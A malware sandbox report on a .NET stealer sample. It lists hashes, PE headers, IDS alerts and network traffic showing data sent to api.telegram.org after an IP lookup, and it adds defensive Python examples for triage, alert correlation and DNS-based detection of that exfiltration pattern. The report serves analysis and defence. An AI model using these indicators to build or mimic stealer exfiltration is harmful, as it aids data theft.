                                                                                              SSDEEP:192:yD1DgPn0BkoOQuA5bUWDX6+7VuP7Ewvjd:A1cPn0BktQuubrt7VuP7Ewrd
                                                                                              MD5:5B01CD9FA62FDF35D1A4587F2676CA31
                                                                                              SHA1:25BBFAC890114F4ECE0BF818F504FFE6102004B8
                                                                                              SHA-256:74D3D72E8CEB233D400747C902F3331B3824902C81B6EF8AA3D7AC85A7A3F095
                                                                                              SHA-512:A565038CDF3C69621F31D8DE4558F74375AADF1DC881C2C82A877C105437F7F9B1D97D1652E98566984EFCA8F1C39224B40B450C742610395A265D81362254DC
                                                                                              Malicious:false
Preview:SQLite format 3......@ .......A...........W......................................................v............A........ [remaining preview bytes are non-printable and rendered as dots]
                                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Entropy (8bit):5.781938114168424
                                                                                              TrID:
                                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                              • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                              • Windows Screen Saver (13104/52) 0.07%
                                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                              File name:zyEDYRU0jw.exe
                                                                                              File size:171'008 bytes
                                                                                              MD5:41d3660b5321768122f4c25ac9868fc3
                                                                                              SHA1:d42e3c5fc24e309581819cba723b14c3c247d824
                                                                                              SHA256:c43a34e78ba6913551af41857fb63a3545acd6a9248e8a4de884988b3ccf895d
                                                                                              SHA512:e02797980f11075715499878f06cfcb71a12da81f8b62f7c30deb31b831137472c450b95f5ebe9349a4205041b6f65c6468d217c2fa36a91902f75c7d5aed549
                                                                                              SSDEEP:3072:oBYHQAFbcjCdDK8l8wqxrytfAndlzFvxHebZ5h2jgSw6KXwApEnB:oBYHjajw5lB2LzdxHeblqk6K
                                                                                              TLSH:27F34C6833FD4A19F3BF4A3998B4919046BAF9A56933D75D598030FC2A327C1DA10B73
                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...5............."...0.................. ........@.. ....................................`................................
                                                                                              Icon Hash:90cececece8e8eb0
                                                                                              Entrypoint:0x42a602
                                                                                              Entrypoint Section:.text
                                                                                              Digitally signed:false
                                                                                              Imagebase:0x400000
                                                                                              Subsystem:windows gui
                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                              Time Stamp:0xB880F835 [Fri Feb 3 01:58:13 2068 UTC]
                                                                                              TLS Callbacks:
                                                                                              CLR (.Net) Version:
                                                                                              OS Version Major:4
                                                                                              OS Version Minor:0
                                                                                              File Version Major:4
                                                                                              File Version Minor:0
                                                                                              Subsystem Version Major:4
                                                                                              Subsystem Version Minor:0
                                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
Instruction (linear disassembly from the entry point 0x42a602; this file is a managed assembly, so the only native instruction that executes here is the first one, a jmp through the IAT at 0x402000 = image base 0x400000 + IAT RVA 0x2000, which resolves to the sole import mscoree!_CorExeMain; the instructions listed after it are the disassembler reading whatever bytes follow the 6-byte stub, not code the process runs)
jmp dword ptr [00402000h]
                                                                                              push ecx
                                                                                              hlt
                                                                                              cmpsd
                                                                                              push eax
                                                                                              jle 00007F675CE9F4E3h
                                                                                              push ebx
                                                                                              sbb dl, byte ptr [edi]
                                                                                              movsb
                                                                                              ret
                                                                                              cmp ah, byte ptr [edi]
                                                                                              pop esi
                                                                                              xchg eax, esi
                                                                                              cmp ebp, dword ptr [ebx-62E03495h]
                                                                                              inc ebp
                                                                                              int1
                                                                                              lodsb
                                                                                              cli
                                                                                              pop eax
                                                                                              stosd
                                                                                              dec ebx
                                                                                              jecxz 00007F675CE9F4A5h
                                                                                              xchg eax, ebx
                                                                                              and byte ptr [eax], dh
                                                                                              cli
                                                                                              push ebp
                                                                                              lodsd
                                                                                              jbe 00007F675CE9F50Fh
                                                                                              test byte ptr [eax-0A6E8934h], 00000002h
                                                                                              dec esp
                                                                                              and eax, FCD7E54Fh
                                                                                              lds ebp, fword ptr [edx]
                                                                                              retf
                                                                                              xlatb
                                                                                              xor eax, 62B58044h
                                                                                              mov dword ptr [5AB1DE8Fh], eax
                                                                                              dec ecx
                                                                                              and eax, 45671BBAh
                                                                                              jmp far E1C0h : FE5D980Eh
                                                                                              ret
                                                                                              das
                                                                                              jne 00007F675CE9F4A4h
                                                                                              or dword ptr [eax+esi*8+12h], A397468Dh
                                                                                              imul edx, ebx, F9h
                                                                                              mov byte ptr [ebx], FFFFFF8Fh
                                                                                              pop edi
                                                                                              out 15h, eax
                                                                                              xchg eax, edx
                                                                                              pushfd
                                                                                              xchg eax, ebp
                                                                                              mov edi, 95EB7A6Dh
                                                                                              push edx
                                                                                              pop ecx
                                                                                              fcmovbe st(0), st(4)
                                                                                              mov esi, 74582D83h
                                                                                              and ebx, edx
                                                                                              dec ecx
                                                                                              loopne 00007F675CE9F50Bh
                                                                                              sub dword ptr [esi+7544C8C9h], ecx
                                                                                              retn 6A89h
                                                                                              hlt
                                                                                              mov seg?, word ptr [ecx+78h]
                                                                                              cdq
                                                                                              pop eax
                                                                                              imul esp, dword ptr [edi], B9h
                                                                                              jno 00007F675CE9F47Fh
                                                                                              mov esi, F0B64FE1h
                                                                                              mov byte ptr [ebp-53DF36E9h], ch
                                                                                              jnl 0000F471h
                                                                                              cmp dh, byte ptr [ebx-1AE7B521h]
                                                                                              sbb dh, byte ptr [ecx]
                                                                                              adc byte ptr [edi+62603351h], 00000053h
                                                                                              jnle 00007F675CE9F4E7h
                                                                                              mov cl, 64h
                                                                                              jnbe 00007F675CE9F482h
                                                                                              mov ebx, FE84AE6Bh
                                                                                              and dword ptr [eax+2B08F91Ch], 00487094h
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x2a5b0          0x4f          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x2c000          0x5d0         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x2e000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x2a514          0x38          .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity      File Type  Entropy              Characteristics
.text   0x2000           0x29068       0x29200   76b77f85cd4aa4ab9dddb98589135bef  False     0.4165202317629179   data       5.80755836163704     IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc   0x2c000          0x5d0         0x600     f08edb0240cdcebdcca1b93f0f59732a  False     0.4427083333333333   data       4.28181878845981     IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x2e000          0xc           0x200     0f9136305b308c6636cd9d39e281f797  False     0.044921875          data       0.10191042566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name         RVA      Size   Type                                                                              Language  Country  ZLIB Complexity
RT_VERSION   0x2c090  0x340  data                                                                                                 0.45072115384615385
RT_MANIFEST  0x2c3e0  0x1ea  XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators                    0.5489795918367347
DLL          Import
mscoree.dll  _CorExeMain
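The header facts above (entry point, IAT and COM descriptor directories, section table, single mscoree import) are what decide whether the entry-point disassembly is worth reading at all. The following is an added example, not code from Joe Sandbox or from the report: it takes those values as constants and checks that the entry point is the CLR loader stub, i.e. a 6-byte `jmp dword ptr [abs32]` whose target lies inside the IAT while a CLR header is present. The stub bytes `FF 25 00 20 40 00` are reconstructed from the mnemonic the report prints (the standard encoding of `jmp dword ptr [00402000h]`), and `section_anomalies` is a hypothetical helper name for two packer heuristics that do not fire on this sample.

```python
"""Static triage from PE header facts: is the entry point the managed (.NET) stub?"""
import struct
from dataclasses import dataclass


@dataclass(frozen=True)
class Section:
    name: str
    rva: int
    vsize: int
    rawsize: int
    characteristics: frozenset


# Values copied from the report above; the stub bytes are reconstructed from the mnemonic.
PAGE_IMAGE_BASE = 0x400000
PAGE_ENTRY_VA = 0x42A602
PAGE_ENTRY_STUB = bytes.fromhex("ff2500204000")      # jmp dword ptr [0x00402000]
PAGE_DIRECTORIES = {                                 # name -> (RVA, size)
    "IMPORT": (0x2A5B0, 0x4F),
    "IAT": (0x2000, 0x8),
    "COM_DESCRIPTOR": (0x2008, 0x48),
}
PAGE_SECTIONS = [
    Section(".text", 0x2000, 0x29068, 0x29200,
            frozenset({"IMAGE_SCN_CNT_CODE", "IMAGE_SCN_MEM_EXECUTE", "IMAGE_SCN_MEM_READ"})),
    Section(".rsrc", 0x2C000, 0x5D0, 0x600,
            frozenset({"IMAGE_SCN_CNT_INITIALIZED_DATA", "IMAGE_SCN_MEM_READ"})),
    Section(".reloc", 0x2E000, 0xC, 0x200,
            frozenset({"IMAGE_SCN_CNT_INITIALIZED_DATA", "IMAGE_SCN_MEM_DISCARDABLE",
                       "IMAGE_SCN_MEM_READ"})),
]


def rva_to_section(sections, rva):
    """Section whose mapped range covers rva (using the larger of virtual and raw size)."""
    for s in sections:
        if s.rva <= rva < s.rva + max(s.vsize, s.rawsize):
            return s
    return None


def decode_indirect_jmp(stub):
    """FF 25 disp32 is 'jmp dword ptr [abs32]' in 32-bit code; return the target or None."""
    if len(stub) >= 6 and stub[:2] == b"\xff\x25":
        return struct.unpack_from("<I", stub, 2)[0]
    return None


def classify_entry_point(entry_va, image_base, stub, directories, sections):
    """Decide whether the entry point is the CLR loader stub or native code worth disassembling."""
    rva = entry_va - image_base
    sec = rva_to_section(sections, rva)
    iat_rva, iat_size = directories.get("IAT", (0, 0))
    _clr_rva, clr_size = directories.get("COM_DESCRIPTOR", (0, 0))
    target = decode_indirect_jmp(stub)
    in_iat = target is not None and iat_rva <= target - image_base < iat_rva + iat_size
    return {
        "entry_rva": rva,
        "entry_section": sec.name if sec else None,
        "entry_executable": bool(sec and "IMAGE_SCN_MEM_EXECUTE" in sec.characteristics),
        "has_clr_header": clr_size > 0,
        "jmp_target_in_iat": in_iat,
        # Only both facts together justify "nothing after the jmp is code": a native
        # binary may also start with an IAT jmp, and a CLR header alone can be a decoy.
        "managed_stub": clr_size > 0 and in_iat,
    }


def section_anomalies(sections):
    """Heuristics to check before trusting a static disassembly at all: W+X sections and
    sections with no bytes on disk (filled in at runtime by a packer or loader)."""
    issues = []
    for s in sections:
        if {"IMAGE_SCN_MEM_WRITE", "IMAGE_SCN_MEM_EXECUTE"} <= s.characteristics:
            issues.append((s.name, "writable and executable"))
        if s.rawsize == 0 and s.vsize > 0:
            issues.append((s.name, "no data on disk, populated at runtime"))
    return issues


if __name__ == "__main__":
    verdict = classify_entry_point(PAGE_ENTRY_VA, PAGE_IMAGE_BASE, PAGE_ENTRY_STUB,
                                   PAGE_DIRECTORIES, PAGE_SECTIONS)
    for key, value in verdict.items():
        print(f"{key:18} {value}")
    print("anomalies:", section_anomalies(PAGE_SECTIONS) or "none")
```

For this sample the verdict is `managed_stub: True`, which is the reason to ignore the instruction listing after the jmp and move on to the CIL with a .NET decompiler; the same function returning `False` on a file that still has a CLR header is the cue that a native loader or packer sits in front of the managed code.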
Timestamp                        SID      Signature                                                                           Severity  Source IP        Source Port  Dest IP          Dest Port  Protocol
2024-12-17T19:54:43.109091+0100  2843856  ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screenshot.) M2  1         192.168.11.20    49757        149.154.167.220  443        TCP
2024-12-17T19:54:44.188399+0100  2039009  ET MALWARE Win32/SaintStealer CnC Response                                          1         149.154.167.220  443          192.168.11.20    49757      TCP
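Both alerts fire on the same TCP conversation (guest port 49757 to 149.154.167.220:443), and the packet timeline that follows lists that conversation packet by packet. The following is an added example, not code from Joe Sandbox or from the report: it rebuilds conversations from timeline rows, orients them client-to-server using the first packet seen (the role a SYN plays in a real capture), and attaches each alert to the conversation it fired on by endpoint pair and start time, so that an alert on a reused port is matched to the right connection. The sample rows are constructed from a handful of the report's own rows; "CET" is assumed to be UTC+1 (the alert timestamps carry +0100 explicitly) and `LOCAL_NET` is an assumption about the guest's subnet.

```python
"""Rebuild TCP conversations from a sandbox packet timeline and tie IDS alerts to them."""
import re
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone

# Assumption: the report's "CET" means UTC+1 (its alert timestamps carry +0100 explicitly).
TZ_OFFSETS = {"CET": timezone(timedelta(hours=1)), "UTC": timezone.utc}
LOCAL_NET = "192.168.11."   # assumption: the analysis guest's subnet, as seen in the report

# Constructed sample: a few rows in the layout of the report's alert and timeline tables.
SAMPLE_ALERTS = """\
2024-12-17T19:54:43.109091+0100  2843856  ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screenshot.) M2  1  192.168.11.20  49757  149.154.167.220  443  TCP
2024-12-17T19:54:44.188399+0100  2039009  ET MALWARE Win32/SaintStealer CnC Response  1  149.154.167.220  443  192.168.11.20  49757  TCP
"""
SAMPLE_TIMELINE = """\
Dec 17, 2024 19:54:36.143249035 CET  49756  80     192.168.11.20    104.16.184.241
Dec 17, 2024 19:54:36.278567076 CET  80     49756  104.16.184.241   192.168.11.20
Dec 17, 2024 19:54:42.186014891 CET  49757  443    192.168.11.20    149.154.167.220
Dec 17, 2024 19:54:42.186033010 CET  443    49757  149.154.167.220  192.168.11.20
Dec 17, 2024 19:54:43.107464075 CET  49757  443    192.168.11.20    149.154.167.220
Dec 17, 2024 19:54:43.109019041 CET  49757  443    192.168.11.20    149.154.167.220
"""
TIMELINE_RE = re.compile(
    r"^(\w{3} \d{1,2}, \d{4} \d\d:\d\d:\d\d)\.(\d+) (\w+)\s+(\d+)\s+(\d+)\s+(\S+)\s+(\S+)$")
ALERT_FIELDS = ("ts", "sid", "signature", "severity", "sip", "sport", "dip", "dport", "proto")


@dataclass(frozen=True)
class Packet:
    ts: datetime
    sip: str
    sport: int
    dip: str
    dport: int


@dataclass
class Flow:
    client: str
    cport: int
    server: str
    sport: int
    first_seen: datetime
    last_seen: datetime
    outbound: int = 0   # client -> server packets
    inbound: int = 0    # server -> client packets

    @property
    def key(self):
        return (self.client, self.cport, self.server, self.sport)

    @property
    def packets(self):
        return self.outbound + self.inbound


def parse_timeline(text):
    packets = []
    for line in text.splitlines():
        m = TIMELINE_RE.match(line.strip())
        if not m:
            continue   # header row or anything that is not a packet row
        base, frac, tzname, sport, dport, sip, dip = m.groups()
        # strptime's %f takes at most 6 digits; the report prints nanoseconds, so truncate.
        ts = datetime.strptime(f"{base}.{frac[:6]}", "%b %d, %Y %H:%M:%S.%f")
        packets.append(Packet(ts.replace(tzinfo=TZ_OFFSETS[tzname]), sip, int(sport), dip, int(dport)))
    return packets


def build_flows(packets):
    """First packet seen for an endpoint pair defines the client -> server direction."""
    flows = {}
    for p in sorted(packets, key=lambda p: p.ts):
        pair = frozenset({(p.sip, p.sport), (p.dip, p.dport)})
        f = flows.get(pair)
        if f is None:
            f = flows[pair] = Flow(p.sip, p.sport, p.dip, p.dport, p.ts, p.ts)
        f.last_seen = max(f.last_seen, p.ts)
        if (p.sip, p.sport) == (f.client, f.cport):
            f.outbound += 1
        else:
            f.inbound += 1
    return {f.key: f for f in flows.values()}


def parse_alerts(text):
    alerts = []
    for line in text.splitlines():
        parts = re.split(r"\s{2,}", line.strip())
        if len(parts) != len(ALERT_FIELDS) or not parts[1].isdigit():
            continue   # header row
        a = dict(zip(ALERT_FIELDS, parts))
        a["ts"] = datetime.strptime(a["ts"], "%Y-%m-%dT%H:%M:%S.%f%z")
        for k in ("sid", "severity", "sport", "dport"):
            a[k] = int(a[k])
        alerts.append(a)
    return alerts


def correlate(flows, alerts, slack=timedelta(seconds=5)):
    """Attach each alert to the conversation with the same endpoints (either direction) that
    had started by the time it fired; on port reuse the most recently started flow wins."""
    hits = []
    for a in alerts:
        ends = frozenset({(a["sip"], a["sport"]), (a["dip"], a["dport"])})
        candidates = [f for f in flows.values()
                      if frozenset({(f.client, f.cport), (f.server, f.sport)}) == ends
                      and f.first_seen <= a["ts"] + slack]
        best = max(candidates, key=lambda f: f.first_seen, default=None)
        hits.append((a["sid"], best.key if best else None, a["signature"]))
    return hits


def remote_endpoints(flows):
    """Remote ip:port pairs the guest initiated contact with, first contact and packet count."""
    return sorted((f.server, f.sport, f.first_seen.isoformat(), f.packets)
                  for f in flows.values() if f.client.startswith(LOCAL_NET))


if __name__ == "__main__":
    fl = build_flows(parse_timeline(SAMPLE_TIMELINE))
    for ep in remote_endpoints(fl):
        print("contact %s:%d first %s packets=%d" % ep)
    for sid, key, sig in correlate(fl, parse_alerts(SAMPLE_ALERTS)):
        print(f"sid {sid} -> flow {key}: {sig}")
```

Matching on the unordered endpoint pair is what lets the inbound "CnC Response" alert (source 149.154.167.220:443) land on the same conversation as the outbound POST alert; matching on direction-sensitive tuples would split one TLS session into two unrelated findings.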
Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Dec 17, 2024 19:54:36.143249035 CET  49756        80         192.168.11.20    104.16.184.241
Dec 17, 2024 19:54:36.278567076 CET  80           49756      104.16.184.241   192.168.11.20
Dec 17, 2024 19:54:36.278779984 CET  49756        80         192.168.11.20    104.16.184.241
Dec 17, 2024 19:54:36.278979063 CET  49756        80         192.168.11.20    104.16.184.241
Dec 17, 2024 19:54:36.413717031 CET  80           49756      104.16.184.241   192.168.11.20
Dec 17, 2024 19:54:36.455025911 CET  80           49756      104.16.184.241   192.168.11.20
Dec 17, 2024 19:54:36.496998072 CET  49756        80         192.168.11.20    104.16.184.241
Dec 17, 2024 19:54:42.186014891 CET  49757        443        192.168.11.20    149.154.167.220
Dec 17, 2024 19:54:42.186033010 CET  443          49757      149.154.167.220  192.168.11.20
Dec 17, 2024 19:54:42.186263084 CET  49757        443        192.168.11.20    149.154.167.220
Dec 17, 2024 19:54:42.194519997 CET  49757        443        192.168.11.20    149.154.167.220
Dec 17, 2024 19:54:42.194530010 CET  443          49757      149.154.167.220  192.168.11.20
Dec 17, 2024 19:54:42.701729059 CET  443          49757      149.154.167.220  192.168.11.20
Dec 17, 2024 19:54:42.701934099 CET  49757        443        192.168.11.20    149.154.167.220
Dec 17, 2024 19:54:42.706684113 CET  49757        443        192.168.11.20    149.154.167.220
Dec 17, 2024 19:54:42.706697941 CET  443          49757      149.154.167.220  192.168.11.20
Dec 17, 2024 19:54:42.707202911 CET  443          49757      149.154.167.220  192.168.11.20
Dec 17, 2024 19:54:42.739449024 CET  49757        443        192.168.11.20    149.154.167.220
Dec 17, 2024 19:54:42.739917040 CET  49756        80         192.168.11.20    104.16.184.241
Dec 17, 2024 19:54:42.786207914 CET  443          49757      149.154.167.220  192.168.11.20
Dec 17, 2024 19:54:42.875387907 CET  80           49756      104.16.184.241   192.168.11.20
Dec 17, 2024 19:54:42.875556946 CET  49756        80         192.168.11.20    104.16.184.241
Dec 17, 2024 19:54:43.107464075 CET  49757        443        192.168.11.20    149.154.167.220
Dec 17, 2024 19:54:43.107474089 CET  443          49757      149.154.167.220  192.168.11.20
Dec 17, 2024 19:54:43.108421087 CET  49757        443        192.168.11.20    149.154.167.220
Dec 17, 2024 19:54:43.108428955 CET  443          49757      149.154.167.220  192.168.11.20
Dec 17, 2024 19:54:43.108549118 CET  49757        443        192.168.11.20    149.154.167.220
Dec 17, 2024 19:54:43.108558893 CET  443          49757      149.154.167.220  192.168.11.20
Dec 17, 2024 19:54:43.108591080 CET  49757        443        192.168.11.20    149.154.167.220
Dec 17, 2024 19:54:43.108597994 CET  443          49757      149.154.167.220  192.168.11.20
Dec 17, 2024 19:54:43.108644009 CET  49757        443        192.168.11.20    149.154.167.220
Dec 17, 2024 19:54:43.108644009 CET  49757        443        192.168.11.20    149.154.167.220
Dec 17, 2024 19:54:43.108654976 CET  443          49757      149.154.167.220  192.168.11.20
Dec 17, 2024 19:54:43.108659029 CET  443          49757      149.154.167.220  192.168.11.20
Dec 17, 2024 19:54:43.108825922 CET  49757        443        192.168.11.20    149.154.167.220
Dec 17, 2024 19:54:43.108825922 CET  49757        443        192.168.11.20    149.154.167.220
Dec 17, 2024 19:54:43.108827114 CET  49757        443        192.168.11.20    149.154.167.220
Dec 17, 2024 19:54:43.108838081 CET  443          49757      149.154.167.220  192.168.11.20
Dec 17, 2024 19:54:43.108844042 CET  443          49757      149.154.167.220  192.168.11.20
Dec 17, 2024 19:54:43.108846903 CET  443          49757      149.154.167.220  192.168.11.20
Dec 17, 2024 19:54:43.108849049 CET  49757        443        192.168.11.20    149.154.167.220
Dec 17, 2024 19:54:43.108853102 CET  443          49757      149.154.167.220  192.168.11.20
Dec 17, 2024 19:54:43.109019041 CET  49757        443        192.168.11.20    149.154.167.220
Dec 17, 2024 19:54:43.109019041 CET  49757        443        192.168.11.20    149.154.167.220
Dec 17, 2024 19:54:43.109019041 CET  49757        443        192.168.11.20    149.154.167.220
Dec 17, 2024 19:54:43.109030008 CET  443          49757      149.154.167.220  192.168.11.20
Dec 17, 2024 19:54:43.109035015 CET  443          49757      149.154.167.220  192.168.11.20
Dec 17, 2024 19:54:43.109039068 CET  443          49757      149.154.167.220  192.168.11.20
Dec 17, 2024 19:54:43.109040976 CET  49757        443        192.168.11.20    149.154.167.220
Dec 17, 2024 19:54:43.109045982 CET  443          49757      149.154.167.220  192.168.11.20
Dec 17, 2024 19:54:43.109196901 CET  49757        443        192.168.11.20    149.154.167.220
Dec 17, 2024 19:54:43.109206915 CET  443          49757      149.154.167.220  192.168.11.20
Dec 17, 2024 19:54:43.109380007 CET  49757        443        192.168.11.20    149.154.167.220
Dec 17, 2024 19:54:43.109380007 CET  49757        443        192.168.11.20    149.154.167.220
Dec 17, 2024 19:54:43.109380007 CET  49757        443        192.168.11.20    149.154.167.220
Dec 17, 2024 19:54:43.109390974 CET  443          49757      149.154.167.220  192.168.11.20
Dec 17, 2024 19:54:43.109397888 CET  49757        443        192.168.11.20    149.154.167.220
Dec 17, 2024 19:54:43.109416008 CET  443          49757      149.154.167.220  192.168.11.20
Dec 17, 2024 19:54:43.109424114 CET  443          49757      149.154.167.220  192.168.11.20
Dec 17, 2024 19:54:43.109560013 CET  49757        443        192.168.11.20    149.154.167.220
Dec 17, 2024 19:54:43.109560013 CET  49757        443        192.168.11.20    149.154.167.220
Dec 17, 2024 19:54:43.109560013 CET  49757        443        192.168.11.20    149.154.167.220
Dec 17, 2024 19:54:43.109572887 CET  443          49757      149.154.167.220  192.168.11.20
Dec 17, 2024 19:54:43.109577894 CET  443          49757      149.154.167.220  192.168.11.20
Dec 17, 2024 19:54:43.109580994 CET  443          49757      149.154.167.220  192.168.11.20
Dec 17, 2024 19:54:43.109584093 CET  49757        443        192.168.11.20    149.154.167.220
Dec 17, 2024 19:54:43.109584093 CET  49757        443        192.168.11.20    149.154.167.220
Dec 17, 2024 19:54:43.109590054 CET  443          49757      149.154.167.220  192.168.11.20
Dec 17, 2024 19:54:43.109600067 CET  443          49757      149.154.167.220  192.168.11.20
Dec 17, 2024 19:54:43.109750032 CET  49757        443        192.168.11.20    149.154.167.220
Dec 17, 2024 19:54:43.109750032 CET  49757        443        192.168.11.20    149.154.167.220
Dec 17, 2024 19:54:43.109750032 CET  49757        443        192.168.11.20    149.154.167.220
Dec 17, 2024 19:54:43.109761953 CET  443          49757      149.154.167.220  192.168.11.20
Dec 17, 2024 19:54:43.109766960 CET  443          49757      149.154.167.220  192.168.11.20
Dec 17, 2024 19:54:43.109770060 CET  443          49757      149.154.167.220  192.168.11.20
Dec 17, 2024 19:54:43.109910011 CET  49757        443        192.168.11.20    149.154.167.220
Dec 17, 2024 19:54:43.109920025 CET  443          49757      149.154.167.220  192.168.11.20
Dec 17, 2024 19:54:43.109925985 CET  49757        443        192.168.11.20    149.154.167.220
Dec 17, 2024 19:54:43.109925985 CET  49757        443        192.168.11.20    149.154.167.220
Dec 17, 2024 19:54:43.109936953 CET  443          49757      149.154.167.220  192.168.11.20
Dec 17, 2024 19:54:43.109941006 CET  443          49757      149.154.167.220  192.168.11.20
Dec 17, 2024 19:54:43.110095978 CET  49757        443        192.168.11.20    149.154.167.220
Dec 17, 2024 19:54:43.110095978 CET  49757        443        192.168.11.20    149.154.167.220
Dec 17, 2024 19:54:43.110095978 CET  49757        443        192.168.11.20    149.154.167.220
Dec 17, 2024 19:54:43.110106945 CET  443          49757      149.154.167.220  192.168.11.20
                                                                                              Dec 17, 2024 19:54:43.110110998 CET44349757149.154.167.220192.168.11.20
                                                                                              Dec 17, 2024 19:54:43.110114098 CET44349757149.154.167.220192.168.11.20
                                                                                              Dec 17, 2024 19:54:43.177700996 CET44349757149.154.167.220192.168.11.20
                                                                                              Dec 17, 2024 19:54:43.229851007 CET49757443192.168.11.20149.154.167.220
                                                                                              Dec 17, 2024 19:54:44.188199997 CET44349757149.154.167.220192.168.11.20
                                                                                              Dec 17, 2024 19:54:44.188280106 CET44349757149.154.167.220192.168.11.20
                                                                                              Dec 17, 2024 19:54:44.188453913 CET49757443192.168.11.20149.154.167.220
                                                                                              Dec 17, 2024 19:54:44.189275026 CET49757443192.168.11.20149.154.167.220
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 17, 2024 19:54:35.995146036 CET | 63903 | 53 | 192.168.11.20 | 1.1.1.1
Dec 17, 2024 19:54:36.137656927 CET | 53 | 63903 | 1.1.1.1 | 192.168.11.20
Dec 17, 2024 19:54:36.486321926 CET | 61692 | 53 | 192.168.11.20 | 1.1.1.1
Dec 17, 2024 19:54:36.623277903 CET | 53 | 61692 | 1.1.1.1 | 192.168.11.20
Dec 17, 2024 19:54:42.047708988 CET | 58308 | 53 | 192.168.11.20 | 1.1.1.1
Dec 17, 2024 19:54:42.184120893 CET | 53 | 58308 | 1.1.1.1 | 192.168.11.20
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 17, 2024 19:54:35.995146036 CET | 192.168.11.20 | 1.1.1.1 | 0xbdb | Standard query (0) | icanhazip.com | A (IP address) | IN (0x0001) | false
Dec 17, 2024 19:54:36.486321926 CET | 192.168.11.20 | 1.1.1.1 | 0x28ce | Standard query (0) | 90.168.9.0.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
Dec 17, 2024 19:54:42.047708988 CET | 192.168.11.20 | 1.1.1.1 | 0xb94b | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 17, 2024 19:54:36.137656927 CET | 1.1.1.1 | 192.168.11.20 | 0xbdb | No error (0) | icanhazip.com | | 104.16.184.241 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 19:54:36.137656927 CET | 1.1.1.1 | 192.168.11.20 | 0xbdb | No error (0) | icanhazip.com | | 104.16.185.241 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 19:54:36.623277903 CET | 1.1.1.1 | 192.168.11.20 | 0x28ce | Name error (3) | 90.168.9.0.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
Dec 17, 2024 19:54:42.184120893 CET | 1.1.1.1 | 192.168.11.20 | 0xb94b | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
                                                                                              • api.telegram.org
                                                                                              • icanhazip.com
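Added example, not part of the Joe Sandbox report: a small correlation over the DNS queries in the table above. A stealer that names its loot archive after the victim's public address first resolves an IP-echo service and then the exfiltration API; the function flags a source host that does both within a short window. The query lines below are rebuilt from the report's table in a simplified whitespace-separated shape (a constructed input, values copied from the report); the IP_ECHO_DOMAINS entries other than icanhazip.com and the 60-second window are assumptions of this example.

```python
import re
from datetime import datetime, timedelta

# DNS queries in the order the report lists them (timestamp, source IP, queried name).
# Constructed line format; the values are copied from the DNS query table above.
DNS_QUERIES_CET = """\
Dec 17, 2024 19:54:35.995146036 CET 192.168.11.20 icanhazip.com
Dec 17, 2024 19:54:36.486321926 CET 192.168.11.20 90.168.9.0.in-addr.arpa
Dec 17, 2024 19:54:42.047708988 CET 192.168.11.20 api.telegram.org
"""

# Public "what is my IP" services; only icanhazip.com is on the page, the rest is an
# assumption of this example and should be extended from your own telemetry.
IP_ECHO_DOMAINS = {"icanhazip.com", "api.ipify.org", "ifconfig.me", "ip-api.com"}
EXFIL_API_DOMAINS = {"api.telegram.org"}

_LINE = re.compile(
    r"^(?P<ts>\w{3} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2})\.(?P<frac>\d+) \w+ (?P<src>\S+) (?P<name>\S+)$"
)


def parse_queries(text):
    """Parse the constructed query lines into (timestamp, source IP, name) tuples."""
    events = []
    for line in text.splitlines():
        m = _LINE.match(line.strip())
        if not m:
            continue
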